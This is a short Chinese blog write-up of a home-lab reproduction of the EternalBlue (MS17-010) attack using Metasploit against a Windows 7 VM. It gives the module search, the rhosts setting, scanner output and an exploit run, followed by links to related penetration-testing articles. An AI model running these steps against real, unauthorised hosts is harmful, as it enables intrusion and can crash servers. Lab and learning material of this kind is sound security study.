记一次永恒之蓝漏洞利用

最新推荐文章于 2024-09-05 09:41:13 发布

原创最新推荐文章于 2024-09-05 09:41:13 发布 · 2.5k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全

内网环境：

kali的IP：192.168.31.66
win7的IP：192.168.31.88

MSF的模块介绍

Auxiliary:辅助模块
Exploit:攻击模块
Payload:攻击载荷模块
Post:后渗透攻击模块
Encoders:编码模块

步骤:

打开kali，首先进入msconsole,然后db_status 查看是否连接到了数据库，若没有，退出去初始化数据库：msfdb init

打开msfconsole的具体流程可看图：
在这里插入图片描述然后搜索永恒之蓝漏洞：search ms17_010

在这里插入图片描述

use 1->set rhosts 192.168.31.88->run
若出现绿色加号说明可能存在永恒之蓝漏洞
[+] 192.168.31.88:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
use2->set rhosts 192.168.31.88->run

最好情况是得到webshell进入meterpreter后渗透步骤，但永恒之蓝容易把服务器打停机。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

pwn-尚1书_

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ms17_010漏洞利用

xgchenghai的博客

05-03

2235

最近工作中又碰到了勒索病毒事件，尽管“WannaCry”已经过去好几年了，但仍有很多单位、人员不以为然，一些人往往只有发生了惨痛后果才会记得牢。重温一下利用过程，看来以后还用得着…… 一、测试环境使用虚拟机环境进行模拟测试。类型系统环境 IP地址攻击机 kali2020 192.168.10.104 靶机 Windows Server 2008 192.168.10...

MSFConsole 学习记录

AaronLuo

10-24

1372

MSF官方链接，在这里可以获得官方文档及其他帮助介绍 Rex 基本功能库，用于完成日常基本任务，无需人工手动编码实现完成socket连接访问，协议应答(http/ssl/smb等) 编码转换(XOR,BASE64,Unicode) Msf::core 提供Msf的核心基本API，是框架核心能力实现库 Msf:: Base 提供友好的API，便于模块调用的库 Plugin 插...

参与评论您还未登录，请先登录后发表或查看评论

永恒之蓝漏洞利用

qq_47094508的博客

01-22

1637

什么是永恒之蓝 永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。恶意代码会扫描windows已开放的445端口如何攻击（ms17-010）攻击机：192.168.10.110（kali）受害者：192.168.10.109（win7）这里使用kali自带的msf演示，先用search找到你要利用的exp 设置你要打的IP地址 run

MS17-010 MS08-067

qq_75005708的博客

02-27

264

1.准备工作 kali攻击机 Windows 2.查看电脑的IP地址，kali使用ifconfig命令，Windows使用ipconfig。然后我们用kali对Windows进行ping指令发现是可以ping的在kali终端中输入namp -vS 192.168.1.18 此时我们发现Windows的445端口，于是我们可以运用永恒之蓝，因为永恒之蓝是运用445端口进行攻击，我们运用msfconsole这个工具，这个工具是kali自带的。通过search ms17_01

【Shell】awk命令--输出某列，列求和，列求平均值，列最大值，列去重复，取倒列，过滤行，匹配，不匹配，内置变量|定义分隔符|多个分隔符

我的笔记本

04-29

1万+

在awk中运行shell命令目前我所了解的在awk中运行shell命令有2中方式实现 1.awk内置函数system 2.通过awk print出要执行的命令然后交给/bin/bash 执行 awk 内置函数system 执行方法 awk ‘BEGIN{system(“shell命令)}’ 就行 [root@CHSHA-CT-WWW-249 ~]# awk ‘BEGIN{system(“hostname”)}’ CHSHA-CT-WWW-249.360buy.com [root@...

精选资源

Windows 2008永恒之蓝漏洞利用与后渗透测试详解

最新发布

09-23

具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞（MS17-010 EternalBlue）取得目标主机管理访问，最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...

永恒之蓝漏洞复现记录

2301_79155654的博客

09-01

1779

这是一个通信方式。总结来说dministrator是系统内置的管理员用户，一般用户会用到的相关都是以这个权限身份运行的，而System权限是系统本身的权限，只用一些系统进程会具有该权限，正常用户平时并不会接触到。总结来说dministrator是系统内置的管理员用户，一般用户会用到的相关都是以这个权限身份运行的，而System权限是系统本身的权限，只用一些系统进程会具有该权限，正常用户平时并不会接触到。设置payload（指的是在攻击过程中实际执行的代码或命令，这些代码或命令是嵌入在攻击载荷中的。

永恒之蓝 (EternalBlue) 漏洞利用原理详解

volta_xu的博客

06-02

3239

SMB（Server Message Block）协议是一种网络文件共享协议，主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中，SMB协议是默认启用的，用于提供文件共享服务。

渗透测试基础之永恒之蓝漏洞复现

记录开发和安全学习过程中的点点滴滴

09-08

2473

渗透测试（Penetration Testing）是指专业的安全测试人员模拟黑客攻击的行为，对目标系统进行主动攻击测试的过程。通过模拟攻击，渗透测试帮助企业评估其系统或网络的安全性，发现潜在的安全漏洞和弱点，从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞，以提升安全性和防御能力。每日一言。

MS17-010永恒之蓝-漏洞利用+修复方法

WEB渗透测试从入门到萌新

04-21

8596

系列文章目录提示：这里可以添加系列文章的所有文章的目录，目录需要自己手动添加例如：第一章 Python 机器学习入门之pandas的使用提示：写完文章后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录系列文章目录前言一、pandas是什么？二、使用步骤 1.引入库 2.读入数据总结前言提示：这里可以添加本文要记录的大概内容：例如：随着人工智能的不断发展，机器学习这门技术也越来越重要，很多人都开启了学习机器学习，本文就介绍了机器学习的

msfconsole的简单使用

m0_53603468的博客

12-30

9167

文章目录前言一、入侵步骤二、msfconsole常用命令总结前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架（MSF3.4）包含3功能模块：msfconsole、msfweb、msfupdate。msfupdate用于软件更新，建议使用前先进行更新，可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块，个人感觉也是功能强大的模块，所有的功能都可以该模块下运行。msfweb 是Metasploit framew.

metasploit中msfconsole使用教程，永恒之蓝漏洞复现

qq_47289634的博客

03-13

3365

msfconsole是metasploit中的一个工具，msfconsole集成了很多漏洞的利用的脚本，永恒之蓝是在 Windows 发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

msfconsole使用指南

2402_85220747的博客

08-20

312

模块命令（Module Commands） advanced 显示模块高级选项。凭证后端命令（Credentials Backend Commands）previous 设置之前加载的模块为当前模块。数据库后端命令（Database Backend Commands）favorites 显示喜欢的模块列表。reload_all 重新加载所有模块。db_save 保存数据服务连接为默认。db_stats 显示数据库统计信息。

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

2317

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

内网安全：Msfconsole攻击技术（成功拿下服务器最高权限.）

热门推荐

网络安全领域___专研者.

03-22

1万+

Msfconsole工具概括： Msfconsole简称（msf）是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种木马，方便于安全测试人员的使用. （1）进行端口扫描. （2）进行服务的扫描.（3）扫描3306（Mysql）端口的弱口令.（4）在msf模块里也可以使用nmap进行扫描.（5）扫描了服务器是用Win XP，然后对服务器进行渗透测试.

Msfconsole工具使用教程

shen213254149的博客

05-25

2752

Msfconsole是Metasploit Framework的一个核心组件，这是一个广泛使用的渗透测试框架。Metasploit是一个开源平台，旨在帮助安全研究人员和渗透测试人员识别、研究和利用安全漏洞。1.2漏洞利用（Exploits）：Msfconsole包含了大量预构建的漏洞利用模块，这些模块可以针对已知的安全漏洞发起攻击，以测试目标系统是否存在这些漏洞。

kali——msfconsole的使用

bunengyongzho666的博客

09-05

3014

msfconsole，全称Metasploit Framework console，是一个开源的渗透测试框架，主要用于网络安全评估和漏洞利用。它包含了各种漏洞利用模块、木马生成工具以及多种渗透文件。该工具不仅能够进行端口扫描、服务检测，还能利用已知漏洞攻击靶机，甚至生成各种渗透文件和木马。这里靶机任然是centos服务机，ip地址为192.168.100.130。

msfconsole常用基本命令

不知名佳佳的博客

12-20

995

命令：setg function以全局方式设置特定的配置参数（EG：设置本地或远程主机参数）。命令： show exploit 列出metasploit框架中的所有渗透攻击模块。命令：search name查找metasploit框架中所有的渗透攻击和其他模块。命令：set function设置特定的配置参数（EG：设置本地或远程主机参数）。命令：show options列出某个渗透攻击或模块中所有的配置参数。命令：show targets列出渗透攻击所有支持的目标平台。

内网DNS报错:** server can‘t find ns1.aaa.com: SERVFAIL

Q先生

06-04

1万+

内网DNS解析错误 1. 起因 DNS主域控在境外,想将内网DNS解析由本地DNS解析.网络环境为内网,无法访问INTERNET.搭建完毕后发现无法解析需要forward那些zone. bind版本:bind-9.11.4 2. 故障现象起初配置非常顺利,通过以下命令,将intra.aaa.com的所有记录都抓取下来,并实现所有现有的A记录和CNAME等解析 dig -t axfr intra.aaa.com @192.168.31.67 当解析intra.aaa.com以外的域名解析时发生了错误.

永恒之蓝漏洞利用工具：渗透测试实战指南

标题中提到的“永恒之蓝ms17_010方程式漏洞利用工具”指的是利用Windows SMB服务器中MS17-010漏洞的攻击工具。MS17-010是一个臭名昭著的安全漏洞，其影响范围广泛，几乎包括了所有Windows操作系统版本。该漏洞最早被...